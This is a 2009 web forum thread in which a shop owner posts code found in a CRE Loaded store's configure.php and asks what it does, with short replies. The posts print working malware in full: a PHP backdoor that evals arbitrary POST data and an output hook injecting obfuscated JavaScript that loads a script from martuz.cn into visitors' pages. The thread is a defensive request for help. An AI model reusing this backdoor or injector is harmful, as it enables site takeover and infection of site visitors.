1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

Possible virus attack - help

Discussion in 'PHP' started by sageman, Jul 17, 2009.

0
  1. #1
    I found the code below in the configure.php file of my cre loaded store. It appears to access a site martuz [dot] cn. can any tell exactly what it is doing?

    thanks!

    <?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBvWUU9J3Zhcn4yMGF+M2R+MjJTfjYzcmlwdEV+NmVnfjY5bn42NX4yMn4yY342Mn4zZH4yMlZ+NjV+NzJzaW9uKCkrfjIyfjJjfjZhfjNkfjIyfjIyfjJjdX4zZG5+NjF2aWd+NjF+NzRvcn4yZXVzZX43Mn40MWdlbnR+M2JpZn4yOCh1fjJlaX42ZWRleH40ZmZ+Mjh+MjJDaHJvfjZkfjY1fjIyKX4zYzApfjI2fjI2KHV+MmVpbmRleE9mKH4yMn41N2lufjIyfjI5fjNlMH4yOX4yNn4yNih+NzV+MmVpbmRlfjc4T2YofjIyTlR+MjB+MzZ+MjJ+Mjl+M2N+MzApfjI2fjI2KH42NH42ZmN+NzV+NmR+NjVudH4yZWNvb2tpZX4yZX42OW5kZXhPfjY2KH4yMm1pZWt+M2QxfjIyKX4zYzB+Mjl+MjZ+MjYodHl+NzBlb2YofjdhcnZ6fjc0cyl+MjF+M2R0fjc5cGVvZih+MjJBfjIyfjI5fjI5KX43Ynpydnp0c34zZH4yMkF+MjJ+M2JldmFsKH4yMn42OWZ+Mjh3aX42ZX42NH42Znd+MmV+MjJ+MmJhK34yMil+NmF+M2RqK34yMithK34yMn40ZGFqb343Mn4yMitiK2F+MmJ+MjJNfjY5fjZlfjZmfjcyfjIyK2J+MmJ+NjErfjIyQn43NWlsZH4yMit+NjIrfjIyan4zYn4yMil+M2J+NjRvY343NW1+NjVudH4yZXdyaXRlfjI4fjIyfjNjc2N+NzJpcH43NH4yMHNyfjYzfjNkfjJmfjJmbWFydHV+MjIrfjIyfjdhfjJlY25+MmZ2fjY5ZH4yZn4zZmlkfjNkfjIyK2orfjIyfjNlfjNjfjVjfjJmc2NyaXB0fjNlfjIyfjI5fjNifjdkJzt2YXIgWExMQT11bmVzY2FwZShvWUUucmVwbGFjZSgvfi9nLCclJykpO2V2YWwoWExMQSl9KSgpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \n\(function\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
    PHP:
     
    sageman, Jul 17, 2009 IP
  2. neegeris

    neegeris Banned

    Messages:
    73
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #2
    I see there is POST and than eval, what means your site can hack anyone, who will post data to tmp_lkojfghx3, you definitely need delete all this code from your site.. your site is not safe now..
     
    neegeris, Jul 17, 2009 IP
  3. sageman

    sageman Peon

    Messages:
    61
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #3
    I believe that it does a database injection which places the code below between the header tag and body tag. i have delete the first code i showed but it hasnt solved the problem. the code below is still inserted. can someone please shed some more light on? thanks!

    <script language=javascript><!-- 
(function(){var oYE='var~20a~3d~22S~63riptE~6eg~69n~65~22~2c~62~3d~22V~65~72sion()+~22~2c~6a~3d~22~22~2cu~3dn~61vig~61~74or~2euse~72~41gent~3bif~28(u~2ei~6edex~4ff~28~22Chro~6d~65~22)~3c0)~26~26(u~2eindexOf(~22~57in~22~29~3e0~29~26~26(~75~2einde~78Of(~22NT~20~36~22~29~3c~30)~26~26(~64~6fc~75~6d~65nt~2ecookie~2e~69ndexO~66(~22miek~3d1~22)~3c0~29~26~26(ty~70eof(~7arvz~74s)~21~3dt~79peof(~22A~22~29~29)~7bzrvzts~3d~22A~22~3beval(~22~69f~28wi~6e~64~6fw~2e~22~2ba+~22)~6a~3dj+~22+a+~22~4dajo~72~22+b+a~2b~22M~69~6e~6f~72~22+b~2b~61+~22B~75ild~22+~62+~22j~3b~22)~3b~64oc~75m~65nt~2ewrite~28~22~3csc~72ip~74~20sr~63~3d~2f~2fmartu~22+~22~7a~2ecn~2fv~69d~2f~3fid~3d~22+j+~22~3e~3c~5c~2fscript~3e~22~29~3b~7d';var XLLA=unescape(oYE.replace(/~/g,'%'));eval(XLLA)})();
 --></script>
    PHP:
     
    sageman, Jul 17, 2009 IP
  4. neegeris

    neegeris Banned

    Messages:
    73
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #4
    you will need create filter with php what removes this from every entry where is this js code..
     
    neegeris, Jul 17, 2009 IP
  5. sajidzaman

    sajidzaman Peon

    Messages:
    2
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #5
    probably a virut virus ...... IMO
     
    sajidzaman, Jul 18, 2009 IP
  6. Jessica Rule

    Jessica Rule Peon

    Messages:
    5
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    1
    #6
    From my point of view, it is virus attack.
     
    Jessica Rule, Mar 19, 2015 IP